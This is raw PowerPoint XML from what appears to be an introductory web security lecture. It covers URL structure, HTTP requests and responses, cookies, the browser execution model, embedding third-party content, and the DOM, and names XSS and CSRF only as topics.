              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CSRF, …</a:t>
            </a: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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation: Same Origin Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS Attacks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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13527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Global identifiers of network-retrievable documents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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/>
              <a:t> http://stanford.edu:81/class?name=cs155#homework</a:t>
            </a:r>
            <a:endParaRPr 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Special characters are encoded as hex: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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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85800" y="2855913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1371600" y="2855913"/>
            <a:ext cx="13716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2743200" y="2855913"/>
            <a:ext cx="246063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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2855913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3657600" y="2855913"/>
            <a:ext cx="13716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11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2855913"/>
            <a:ext cx="1387475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AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="3535363"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -145833"/>
              <a:gd name="adj4" fmla="val 11406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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4262438"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 13236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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2151063" y="4379913"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -413694"/>
              <a:gd name="adj4" fmla="val 9847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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="4370388"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -422736"/>
              <a:gd name="adj4" fmla="val -7607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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="4533900"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -476426"/>
              <a:gd name="adj4" fmla="val -1487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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3810000"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -5442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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Fragment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09600" y="2241550"/>
            <a:ext cx="8305800" cy="2670175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="2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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1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Request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996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Method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057400" y="1600200"/>
            <a:ext cx="577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File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200400" y="1600200"/>
            <a:ext cx="16573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HTTP version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990600" y="1924050"/>
            <a:ext cx="0" cy="280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2362200" y="1924050"/>
            <a:ext cx="0" cy="280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3886200" y="1924050"/>
            <a:ext cx="0" cy="280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7620000" y="1600200"/>
            <a:ext cx="1085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Headers</a:t>
            </a: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H="1">
            <a:off x="7391400" y="1976438"/>
            <a:ext cx="6096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600200" y="5272088"/>
            <a:ext cx="2381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Data – none for GET</a:t>
            </a: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H="1" flipV="1">
            <a:off x="838200" y="4733925"/>
            <a:ext cx="762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200400" y="4905375"/>
            <a:ext cx="1263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Blank line</a:t>
            </a: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H="1" flipV="1">
            <a:off x="838200" y="4429125"/>
            <a:ext cx="2362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54768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595313" y="6019800"/>
            <a:ext cx="8120493" cy="46166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/>
              <a:t>GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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854075" y="2589213"/>
            <a:ext cx="7086600" cy="2862262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42 GMT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Server: Microsoft-Internet-Information-Server/5.0 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Connection: keep-alive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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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Set-Cookie: …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Content-Length: 2543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</a:t>
            </a:r>
          </a:p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&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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Response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77875" y="1619250"/>
            <a:ext cx="16573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HTTP version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1539875" y="19431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597150" y="1619250"/>
            <a:ext cx="1479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Status code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4237037" y="1619250"/>
            <a:ext cx="1822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Reason phrase</a:t>
            </a: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H="1">
            <a:off x="2530475" y="1943100"/>
            <a:ext cx="685800" cy="661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H="1">
            <a:off x="3063875" y="1943100"/>
            <a:ext cx="1676400" cy="738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7483475" y="1695450"/>
            <a:ext cx="1085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Headers</a:t>
            </a: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H="1">
            <a:off x="6569075" y="2019300"/>
            <a:ext cx="1371600" cy="1042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8199437" y="3671888"/>
            <a:ext cx="679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latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r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H="1">
            <a:off x="7050087" y="4052888"/>
            <a:ext cx="145415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" y="5772150"/>
            <a:ext cx="11826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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344487" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="43507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hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="240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r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Reported Web Vulnerabilities "In the Wild"</a:t>
            </a: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825500" y="5943600"/>
            <a:ext cx="80899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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data from aggregator and validator of  NVD-reported vulnerabilities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143000"/>
            <a:ext cx="82359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Content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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203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Basic execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Renders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>May involve images, subframes, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User actions: OnClick, OnMouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rendering: OnLoad, OnBeforeUnload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Timing: setTimeout(),  clearTimeout() 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0772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Pages can embed content from many sources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676400"/>
            <a:ext cx="8458200" cy="4419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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/frame.html”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&gt;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ts val="2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/script.js”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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ts val="2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>CSS (Cascading Style Sheets)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  type="text /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site/com/theme.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  (flash):       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>[using    swfobject.js   script ]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;  	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> so = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>SWFObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/flash.swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>', …); 			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.addParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>',  ‘always'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>flashdiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>');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  <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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534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Object-oriented interface used to read and write docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web page in HTML is structured data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM provides representation of this hierarchy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Examples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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  document.write(document.referrer)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Also Browser Object Model (BOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>window, document, frames[], history, location, navigator (type and version of browser)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4C08035-04FD-45B8-A3AA-04C957743337}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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Running Remote Code is Risky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
